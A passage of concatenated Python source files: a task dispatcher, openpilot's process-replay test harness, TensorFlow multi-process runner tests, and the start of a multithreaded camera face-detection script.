f = float(131 * (contrast + 127)) / (127 * (131 - contrast))
alpha_c = f
gamma_c = 127*(1-f)
buf = cv2.addWeighted(buf, alpha_c, buf, 0, gamma_c)
dest_dir = folder_utils.get_cache_directory('temp')
new_image_file = str(dest_dir.joinpath(uuid4().hex + '.png'))
cv2.imwrite(new_image_file, buf)
return new_image_file
def map(x, in_min, in_max, out_min, out_max):
return int((x-in_min) * (out_max-out_min) / (in_max-in_min) + out_min)
|
dispatcher.py
|
from multiprocessing import cpu_count
from queue import Queue
from threading import Thread
from .runner import Runner
class Dispatcher:
def __init__(self):
self.tasks = Queue()
self.available = cpu_count()
self.runners = []
self.manage_thread = Thread(target=self.run)
self.manage_thread.start()
def get_available(self):
return max(self.available, 1)
def ingest(self, tasks):
self.available -= len(tasks)
for task in tasks:
self.tasks.put(task)
def run(self):
while True:
if not self.tasks.empty():
task = self.tasks.get()
self.runners += [Runner(task, task)]
for runner in self.runners:
if runner.done():
self.available += 1
self.runners.remove(runner)
|
process_replay.py
|
#!/usr/bin/env python3
import importlib
import os
import sys
import threading
import time
import signal
from collections import namedtuple
import capnp
import cereal.messaging as messaging
from cereal import car, log
from cereal.services import service_list
from common.params import Params
from common.timeout import Timeout
from selfdrive.car.fingerprints import FW_VERSIONS
from selfdrive.car.car_helpers import get_car, interfaces
from selfdrive.test.process_replay.helpers import OpenpilotPrefix
from selfdrive.manager.process import PythonProcess
from selfdrive.manager.process_config import managed_processes
# Numpy gives different results based on CPU features after version 19
NUMPY_TOLERANCE = 1e-7
CI = "CI" in os.environ
TIMEOUT = 15
PROC_REPLAY_DIR = os.path.dirname(os.path.abspath(__file__))
FAKEDATA = os.path.join(PROC_REPLAY_DIR, "fakedata/")
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback', 'tolerance', 'fake_pubsubmaster', 'submaster_config'], defaults=({},))
def wait_for_event(evt):
if not evt.wait(TIMEOUT):
if threading.currentThread().getName() == "MainThread":
# tested process likely died. don't let test just hang
raise Exception("Timeout reached. Tested process likely crashed.")
else:
# done testing this process, let it die
sys.exit(0)
class FakeSocket:
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
wait_for_event(self.recv_ready)
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
wait_for_event(self.recv_called)
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
wait_for_event(self.recv_called)
class DumbSocket:
def __init__(self, s=None):
if s is not None:
try:
dat = messaging.new_message(s)
except capnp.lib.capnp.KjException: # pylint: disable=c-extension-no-member
# lists
dat = messaging.new_message(s, 0)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services, ignore_alive=None, ignore_avg_freq=None):
super().__init__(services, ignore_alive=ignore_alive, ignore_avg_freq=ignore_avg_freq, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
wait_for_event(self.update_called)
self.update_called.clear()
super().update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
wait_for_event(self.update_called)
class FakePubMaster(messaging.PubMaster):
def __init__(self, services): # pylint: disable=super-init-not-called
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
try:
data = messaging.new_message(s)
except capnp.lib.capnp.KjException:
data = messaging.new_message(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
wait_for_event(self.get_called)
self.get_called.clear()
def wait_for_msg(self):
wait_for_event(self.send_called)
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
def fingerprint(msgs, fsm, can_sock, fingerprint):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
wait_for_event(can_sock.recv_called)
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['lateralPlan'].sensorValid
wait_for_event(fsm.update_called)
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
def get_car_params(msgs, fsm, can_sock, fingerprint):
if fingerprint:
CarInterface, _, _ = interfaces[fingerprint]
CP = CarInterface.get_params(fingerprint)
else:
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
Params().put("CarParams", CP.to_bytes())
def controlsd_rcv_callback(msg, CP, cfg, fsm):
# no sendcan until controlsd is initialized
socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
if "sendcan" in socks and fsm.frame < 2000:
socks.remove("sendcan")
return socks, len(socks) > 0
def radar_rcv_callback(msg, CP, cfg, fsm):
if msg.which() != "can":
return [], False
elif CP.radarOffCan:
return ["radarState", "liveTracks"], True
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"], True
return [], False
def calibration_rcv_callback(msg, CP, cfg, fsm):
# calibrationd publishes 1 calibrationData every 5 cameraOdometry packets.
# should_recv always true to increment frame
recv_socks = []
frame = fsm.frame + 1 # incrementing hasn't happened yet in SubMaster
if frame == 0 or (msg.which() == 'cameraOdometry' and (frame % 5) == 0):
recv_socks = ["liveCalibration"]
return recv_socks, fsm.frame == 0 or msg.which() == 'cameraOdometry'
def ublox_rcv_callback(msg):
msg_class, msg_id = msg.ubloxRaw[2:4]
if (msg_class, msg_id) in {(1, 7 * 16)}:
return ["gpsLocationExternal"]
elif (msg_class, msg_id) in {(2, 1 * 16 + 5), (10, 9)}:
return ["ubloxGnss"]
else:
return []
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"deviceState": [], "pandaStates": [], "peripheralState": [], "liveCalibration": [], "driverMonitoringState": [], "longitudinalPlan": [], "lateralPlan": [], "liveLocationKalman": [], "liveParameters": [], "radarState": [],
"modelV2": [], "driverCameraState": [], "roadCameraState": [], "managerState": [], "testJoystick": [],
},
ignore=["logMonoTime", "valid", "controlsState.startMonoTime", "controlsState.cumLagMs"],
init_callback=fingerprint,
should_recv_callback=controlsd_rcv_callback,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
submaster_config={'ignore_avg_freq': ['radarState', 'longitudinalPlan']}
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "carState": [], "modelV2": [],
},
ignore=["logMonoTime", "valid", "radarState.cumLagMs"],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
tolerance=None,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"modelV2": ["lateralPlan", "longitudinalPlan"],
"carState": [], "controlsState": [], "radarState": [],
},
ignore=["logMonoTime", "valid", "longitudinalPlan.processingDelay", "longitudinalPlan.solverExecutionTime", "lateralPlan.solverExecutionTime"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"carState": ["liveCalibration"],
"cameraOdometry": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=calibration_rcv_callback,
tolerance=None,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="dmonitoringd",
pub_sub={
"driverState": ["driverMonitoringState"],
"liveCalibration": [], "carState": [], "modelV2": [], "controlsState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="locationd",
pub_sub={
"cameraOdometry": ["liveLocationKalman"],
"sensorEvents": [], "gpsLocationExternal": [], "liveCalibration": [], "carState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=False,
),
ProcessConfig(
proc_name="paramsd",
pub_sub={
"liveLocationKalman": ["liveParameters"],
"carState": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="ubloxd",
pub_sub={
"ubloxRaw": ["ubloxGnss", "gpsLocationExternal"],
},
ignore=["logMonoTime"],
init_callback=None,
should_recv_callback=ublox_rcv_callback,
tolerance=None,
fake_pubsubmaster=False,
),
]
def replay_process(cfg, lr, fingerprint=None):
with OpenpilotPrefix():
if cfg.fake_pubsubmaster:
return python_replay_process(cfg, lr, fingerprint)
else:
return cpp_replay_process(cfg, lr, fingerprint)
def setup_env(simulation=False):
params = Params()
params.clear_all()
params.put_bool("OpenpilotEnabledToggle", True)
params.put_bool("Passive", False)
params.put_bool("DisengageOnAccelerator", True)
params.put_bool("WideCameraOnly", False)
params.put_bool("DisableLogging", False)
os.environ["NO_RADAR_SLEEP"] = "1"
os.environ["REPLAY"] = "1"
if simulation:
os.environ["SIMULATION"] = "1"
elif "SIMULATION" in os.environ:
del os.environ["SIMULATION"]
def python_replay_process(cfg, lr, fingerprint=None):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets, **cfg.submaster_config)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
setup_env()
# TODO: remove after getting new route for civic & accord
migration = {
"HONDA CIVIC 2016 TOURING": "HONDA CIVIC 2016",
"HONDA ACCORD 2018 SPORT 2T": "HONDA ACCORD 2018",
"HONDA ACCORD 2T 2018": "HONDA ACCORD 2018",
"Mazda CX-9 2021": "MAZDA CX-9 2021",
}
if fingerprint is not None:
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = fingerprint
else:
os.environ['SKIP_FW_QUERY'] = ""
os.environ['FINGERPRINT'] = ""
for msg in lr:
if msg.which() == 'carParams':
car_fingerprint = migration.get(msg.carParams.carFingerprint, msg.carParams.carFingerprint)
if msg.carParams.fingerprintSource == "fw" and (car_fingerprint in FW_VERSIONS):
Params().put("CarParamsCache", msg.carParams.as_builder().to_bytes())
else:
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = car_fingerprint
assert(type(managed_processes[cfg.proc_name]) is PythonProcess)
managed_processes[cfg.proc_name].prepare()
mod = importlib.import_module(managed_processes[cfg.proc_name].module)
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock, fingerprint)
CP = car.CarParams.from_bytes(Params().get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
log_msgs, msg_queue = [], []
for msg in pub_msgs:
if cfg.should_recv_callback is not None:
recv_socks, should_recv = cfg.should_recv_callback(msg, CP, cfg, fsm)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(msg.logMonoTime / 1e9, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg().as_builder()
m.logMonoTime = msg.logMonoTime
m = m.as_reader()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
def cpp_replay_process(cfg, lr, fingerprint=None):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub] # We get responses here
pm = messaging.PubMaster(cfg.pub_sub.keys())
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
log_msgs = []
# We need to fake SubMaster alive since we can't inject a fake clock
setup_env(simulation=True)
managed_processes[cfg.proc_name].prepare()
managed_processes[cfg.proc_name].start()
try:
with Timeout(TIMEOUT):
while not all(pm.all_readers_updated(s) for s in cfg.pub_sub.keys()):
time.sleep(0)
# Make sure all subscribers are connected
sockets = {s: messaging.sub_sock(s, timeout=2000) for s in sub_sockets}
for s in sub_sockets:
messaging.recv_one_or_none(sockets[s])
for i, msg in enumerate(pub_msgs):
pm.send(msg.which(), msg.as_builder())
resp_sockets = cfg.pub_sub[msg.which()] if cfg.should_recv_callback is None else cfg.should_recv_callback(msg)
for s in resp_sockets:
response = messaging.recv_one(sockets[s])
if response is None:
print(f"Warning, no response received {i}")
else:
response = response.as_builder()
response.logMonoTime = msg.logMonoTime
response = response.as_reader()
log_msgs.append(response)
if not len(resp_sockets): # We only need to wait if we didn't already wait for a response
while not pm.all_readers_updated(msg.which()):
time.sleep(0)
finally:
managed_processes[cfg.proc_name].signal(signal.SIGKILL)
managed_processes[cfg.proc_name].stop()
return log_msgs
def check_enabled(msgs):
for msg in msgs:
if msg.which() == "carParams":
if msg.carParams.notCar:
return True
elif msg.which() == "controlsState":
if msg.controlsState.active:
return True
return False
|
multi_process_runner_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `multi_process_runner`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ctypes
import json
import os
import sys
import threading
import time
import unittest
from absl import logging
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.eager import test
def proc_func_that_adds_task_type_in_return_data():
return multi_worker_test_base.get_task_type()
def proc_func_that_errors():
raise ValueError('This is an error.')
def proc_func_that_does_nothing():
pass
def proc_func_that_adds_simple_return_data():
return 'dummy_data'
def proc_func_that_returns_args_and_kwargs(*args, **kwargs):
return list(args) + list(kwargs.items())
def proc_func_with_barrier():
return multi_process_runner.barrier()
def proc_func_that_returns_pid():
return os.getpid()
V = None
def proc_func_that_sets_global(val):
global V
old_val = V
V = val
return old_val
class MultiProcessRunnerTest(test.TestCase):
def _worker_idx(self):
config_task = json.loads(os.environ['TF_CONFIG'])['task']
return config_task['index']
def test_multi_process_runner(self):
mpr_result = multi_process_runner.run(
proc_func_that_adds_task_type_in_return_data,
multi_worker_test_base.create_cluster_spec(
num_workers=2, num_ps=3, has_eval=1))
job_count_dict = {'worker': 2, 'ps': 3, 'evaluator': 1}
for data in mpr_result.return_value:
job_count_dict[data] -= 1
self.assertEqual(job_count_dict['worker'], 0)
self.assertEqual(job_count_dict['ps'], 0)
self.assertEqual(job_count_dict['evaluator'], 0)
def test_multi_process_runner_error_propagates_from_subprocesses(self):
runner = multi_process_runner.MultiProcessRunner(
proc_func_that_errors,
multi_worker_test_base.create_cluster_spec(num_workers=1, num_ps=1),
max_run_time=20)
runner.start()
with self.assertRaisesRegexp(ValueError, 'This is an error.'):
runner.join()
def test_multi_process_runner_queue_emptied_between_runs(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
return_value = multi_process_runner.run(
proc_func_that_adds_simple_return_data, cluster_spec).return_value
self.assertTrue(return_value)
self.assertEqual(return_value[0], 'dummy_data')
self.assertEqual(return_value[1], 'dummy_data')
return_value = multi_process_runner.run(proc_func_that_does_nothing,
cluster_spec).return_value
self.assertFalse(return_value)
def test_multi_process_runner_args_passed_correctly(self):
return_value = multi_process_runner.run(
proc_func_that_returns_args_and_kwargs,
multi_worker_test_base.create_cluster_spec(num_workers=1),
args=('a', 'b'),
kwargs={
'c_k': 'c_v'
}).return_value
self.assertEqual(return_value[0][0], 'a')
self.assertEqual(return_value[0][1], 'b')
self.assertEqual(return_value[0][2], ('c_k', 'c_v'))
def test_stdout_captured(self):
def simple_print_func():
print('This is something printed.', flush=True)
return 'This is returned data.'
mpr_result = multi_process_runner.run(
simple_print_func,
multi_worker_test_base.create_cluster_spec(num_workers=2),
list_stdout=True)
std_stream_results = mpr_result.stdout
return_value = mpr_result.return_value
self.assertIn('[worker-0]: This is something printed.\n',
std_stream_results)
self.assertIn('[worker-1]: This is something printed.\n',
std_stream_results)
self.assertIn('This is returned data.', return_value)
def test_termination(self):
def proc_func():
for i in range(0, 10):
print(
'index {}, iteration {}'.format(self._worker_idx(), i), flush=True)
time.sleep(5)
mpr = multi_process_runner.MultiProcessRunner(
proc_func,
multi_worker_test_base.create_cluster_spec(num_workers=2),
list_stdout=True)
mpr.start()
time.sleep(5)
mpr.terminate('worker', 0)
std_stream_results = mpr.join().stdout
# Worker 0 is terminated in the middle, so it should not have iteration 9
# printed.
self.assertIn('[worker-0]: index 0, iteration 0\n', std_stream_results)
self.assertNotIn('[worker-0]: index 0, iteration 9\n',
std_stream_results)
self.assertIn('[worker-1]: index 1, iteration 0\n', std_stream_results)
self.assertIn('[worker-1]: index 1, iteration 9\n', std_stream_results)
def test_termination_and_start_single_process(self):
def proc_func():
for i in range(0, 10):
print(
'index {}, iteration {}'.format(self._worker_idx(), i), flush=True)
time.sleep(1)
mpr = multi_process_runner.MultiProcessRunner(
proc_func,
multi_worker_test_base.create_cluster_spec(num_workers=2),
list_stdout=True)
mpr.start()
time.sleep(3)
mpr.terminate('worker', 0)
mpr.start_single_process('worker', 0)
std_stream_results = mpr.join().stdout
# Worker 0 is terminated in the middle, but a new worker 0 is added, so it
# should still have iteration 9 printed. Moreover, iteration 0 of worker 0
# should happen twice.
self.assertLen(
[s for s in std_stream_results if 'index 0, iteration 0' in s], 2)
self.assertIn('[worker-0]: index 0, iteration 9\n', std_stream_results)
self.assertIn('[worker-1]: index 1, iteration 0\n', std_stream_results)
self.assertIn('[worker-1]: index 1, iteration 9\n', std_stream_results)
def test_streaming(self):
def proc_func():
for i in range(5):
logging.info('(logging) %s-%d, i: %d',
multi_worker_test_base.get_task_type(), self._worker_idx(),
i)
print(
'(print) {}-{}, i: {}'.format(
multi_worker_test_base.get_task_type(), self._worker_idx(), i),
flush=True)
time.sleep(1)
mpr = multi_process_runner.MultiProcessRunner(
proc_func,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=2, num_ps=2, has_eval=True),
list_stdout=True)
mpr._dependence_on_chief = False
mpr.start()
mpr.start_single_process('worker', 2)
mpr.start_single_process('ps', 2)
mpr_result = mpr.join()
list_to_assert = mpr_result.stdout
for job in ['chief', 'evaluator']:
for iteration in range(5):
self.assertTrue(
any('(logging) {}-0, i: {}'.format(job, iteration) in line
for line in list_to_assert))
self.assertTrue(
any('(print) {}-0, i: {}'.format(job, iteration) in line
for line in list_to_assert))
for job in ['worker', 'ps']:
for iteration in range(5):
for task in range(3):
self.assertTrue(
any('(logging) {}-{}, i: {}'.format(job, task, iteration) in line
for line in list_to_assert))
self.assertTrue(
any('(print) {}-{}, i: {}'.format(job, task, iteration) in line
for line in list_to_assert))
task = 3
self.assertFalse(
any('(logging) {}-{}, i: {}'.format(job, task, iteration) in line
for line in list_to_assert))
self.assertFalse(
any('(print) {}-{}, i: {}'.format(job, task, iteration) in line
for line in list_to_assert))
def test_start_in_process_as(self):
def proc_func():
for i in range(5):
logging.info('%s-%d, i: %d', multi_worker_test_base.get_task_type(),
self._worker_idx(), i)
time.sleep(1)
mpr = multi_process_runner.MultiProcessRunner(
proc_func,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1),
list_stdout=True)
def eval_func():
time.sleep(1)
mpr.start_single_process(task_type='evaluator', task_id=0)
eval_thread = threading.Thread(target=eval_func)
eval_thread.start()
mpr.start_in_process_as(as_task_type='chief', as_task_id=0)
eval_thread.join()
list_to_assert = mpr.join().stdout
for job in ['worker', 'evaluator']:
for iteration in range(5):
self.assertTrue(
any('{}-0, i: {}'.format(job, iteration) in line
for line in list_to_assert))
def test_terminate_all_does_not_ignore_error(self):
mpr = multi_process_runner.MultiProcessRunner(
proc_func_that_errors,
multi_worker_test_base.create_cluster_spec(num_workers=2),
list_stdout=True)
mpr.start()
time.sleep(60)
mpr.terminate_all()
with self.assertRaisesRegexp(ValueError, 'This is an error.'):
mpr.join()
def test_barrier(self):
multi_process_runner.run(
proc_func_with_barrier,
cluster_spec=multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1),
)
def test_barrier_called_in_main_process(self):
with self.assertRaises(ValueError):
multi_process_runner.barrier()
def test_stdout_available_when_timeout(self):
def proc_func():
logging.info('something printed')
time.sleep(10000) # Intentionally make the test timeout.
with self.assertRaises(multi_process_runner.SubprocessTimeoutError) as cm:
mpr = multi_process_runner.MultiProcessRunner(
proc_func,
multi_worker_test_base.create_cluster_spec(num_workers=1),
list_stdout=True)
mpr.start()
mpr.join(timeout=60)
mpr.terminate_all()
list_to_assert = cm.exception.mpr_result.stdout
self.assertTrue(
any('something printed' in line for line in list_to_assert))
def test_seg_fault_raises_error(self):
def proc_func_expected_to_seg_fault():
ctypes.string_at(0) # Intentionally made seg fault.
with self.assertRaises(
multi_process_runner.UnexpectedSubprocessExitError) as cm:
multi_process_runner.run(
proc_func_expected_to_seg_fault,
multi_worker_test_base.create_cluster_spec(num_workers=1),
list_stdout=True)
self.assertIn('Missing status(es) from 1 subprocess(es).',
str(cm.exception))
list_to_assert = cm.exception.mpr_result.stdout
self.assertTrue(any('SIGSEGV' in line for line in list_to_assert))
def test_seg_fault_in_chief_raises_error(self):
def proc_func_expected_to_seg_fault():
if multi_worker_test_base.get_task_type() == 'worker':
time.sleep(10000)
ctypes.string_at(0) # Intentionally made seg fault.
with self.assertRaises(
multi_process_runner.UnexpectedSubprocessExitError) as cm:
multi_process_runner.run(
proc_func_expected_to_seg_fault,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1),
list_stdout=True)
self.assertIn('Subprocess chief-0 exited with exit code',
str(cm.exception))
list_to_assert = cm.exception.mpr_result.stdout
self.assertTrue(any('SIGSEGV' in line for line in list_to_assert))
def test_non_zero_exit_code_raises_error(self):
def proc_func_expected_to_exit_with_1():
sys.exit(1)
with self.assertRaises(
multi_process_runner.UnexpectedSubprocessExitError) as cm:
multi_process_runner.run(
proc_func_expected_to_exit_with_1,
multi_worker_test_base.create_cluster_spec(num_workers=1))
self.assertIn('Missing status(es) from 1 subprocess(es).',
str(cm.exception))
class MultiProcessPoolRunnerTest(test.TestCase):
def test_same_process_across_runs(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec)
pid = runner.run(proc_func_that_returns_pid)
for _ in range(3):
self.assertAllEqual(runner.run(proc_func_that_returns_pid), pid)
def test_exceptions_in_sub_process(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec)
pid = runner.run(proc_func_that_returns_pid)
with self.assertRaisesRegexp(ValueError, 'This is an error.'):
runner.run(proc_func_that_errors)
self.assertAllEqual(runner.run(proc_func_that_returns_pid), pid)
def test_tf_config(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec)
result = runner.run(proc_func_that_adds_task_type_in_return_data)
job_count_dict = {'worker': 2, 'chief': 1}
for data in result:
job_count_dict[data] -= 1
self.assertEqual(job_count_dict['worker'], 0)
self.assertEqual(job_count_dict['chief'], 0)
@unittest.expectedFailure
def test_exception_in_main_process(self):
# When there's an exception in the main process, __del__() is not called.
# This test is to verify MultiProcessPoolRunner can cope with __del__() not
# being called.
cluster_spec = multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec)
runner.run(proc_func_that_returns_pid)
raise ValueError('failure')
def test_initializer(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(
cluster_spec, initializer=lambda: proc_func_that_sets_global(1))
result = runner.run(proc_func_that_sets_global, args=(2,))
self.assertAllEqual(result, [1, 1])
if __name__ == '__main__':
multi_process_runner.test_main()
|
avnet_face_detection_mt.py
|
'''
Copyright 2020 Avnet Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
# USAGE
# python avnet_face_detection_mt.py [--input 0] [--detthreshold 0.55] [--nmsthreshold 0.35] [--threads 4]
import numpy as np
import argparse
import imutils
import time
import cv2
import os, errno
import sys
import threading
import queue
from imutils.video import FPS
import runner
from vitis_ai_vart.facedetect import FaceDetect
global bQuit
def taskCapture(inputId,queueIn):
global bQuit
#print("[INFO] taskCapture : starting thread ...")
# Start the FPS counter
fpsIn = FPS().start()
# Initialize the camera input
print("[INFO] taskCapture : starting camera input ...")
cam = cv2.VideoCapture(inputId)
cam.set(cv2.CAP_PROP_FRAME_WIDTH,640)
cam.set(cv2.CAP_PROP_FRAME_HEIGHT,480)
if not (cam.isOpened()):
print("[ERROR] taskCapture : Failed to open camera ", inputId )
exit()
while not bQuit:
# Capture image from camera
ret,frame = cam.read()
# Update the FPS counter
fpsIn.update()
# Push captured image to input queue
queueIn.put(frame)
# Stop the timer and display FPS information
fpsIn.stop()
print("[INFO] taskCapture : elapsed time: {:.2f}".format(fpsIn.elapsed()))
print("[INFO] taskCapture : elapsed FPS: {:.2f}".format(fpsIn.fps()))
#print("[INFO] taskCapture : exiting thread ...")
def taskWorker(worker,dpu,detThreshold,nmsThreshold,queueIn,queueOut):
global bQuit
#print("[INFO] taskWorker[",worker,"] : starting thread ...")
# Start the face detector
dpu_face_detector = FaceDetect(dpu,detThreshold,nmsThreshold)
dpu_face_detector.start()
while not bQuit:
# Pop captured image from input queue
frame = queueIn.get()
# Vitis-AI/DPU based face detector
faces = dpu_face_detector.process(frame)
# loop over the faces
for i,(left,top,right,bottom) in enumerate(faces):
# draw a bounding box surrounding the object so we can
# visualize it
cv2.rectangle( frame, (left,top), (right,bottom), (0,255,0), 2)
# Push processed image to output queue
queueOut.put(frame)
# Stop the face detector
dpu_face_detector.stop()
# workaround : to ensure other worker threads stop,
# make sure input queue is not empty
queueIn.put(frame)
#print("[INFO] taskWorker[",worker,"] : exiting thread ...")
def taskDisplay(queueOut):
global bQuit
#print("[INFO] taskDisplay : starting thread ...")
# Start the FPS counter
fpsOut = FPS().start()
while not bQuit:
# Pop processed image from output queue
frame = queueOut.get()
# Display the processed image
cv2.imshow("Face Detection", frame)
# Update the FPS counter
fpsOut.update()
# if the `q` key was pressed, break from the loop
key = cv2.waitKey(1) & 0xFF
if key == ord("q"):
break
# Trigger all threads to stop
bQuit = True
# Stop the timer and display FPS information
fpsOut.stop()
print("[INFO] taskDisplay : elapsed time: {:.2f}".format(fpsOut.elapsed()))
print("[INFO] taskDisplay : elapsed FPS: {:.2f}".format(fpsOut.fps()))
# Cleanup
cv2.destroyAllWindows()
#print("[INFO] taskDisplay : exiting thread ...")
def main(argv):
global bQuit
bQuit = False
# Construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--input", required=False,
help = "input camera identifier (default = 0)")
ap.add_argument("-d", "--detthreshold", required=False,
help = "face detector softmax threshold (default = 0.55)")
ap.add_argument("-n", "--nmsthreshold", required=False,
help = "face detector NMS threshold (default = 0.35)")
ap.add_argument("-t", "--threads", required=False,
help = "number of worker threads (default = 4)")
args = vars(ap.parse_args())
if not args.get("input",False):
inputId = 0
else:
inputId = int(args["input"])
print('[INFO] input camera identifier = ',inputId)
if not args.get("detthreshold",False):
detThreshold = 0.55
else:
detThreshold = float(args["detthreshold"])
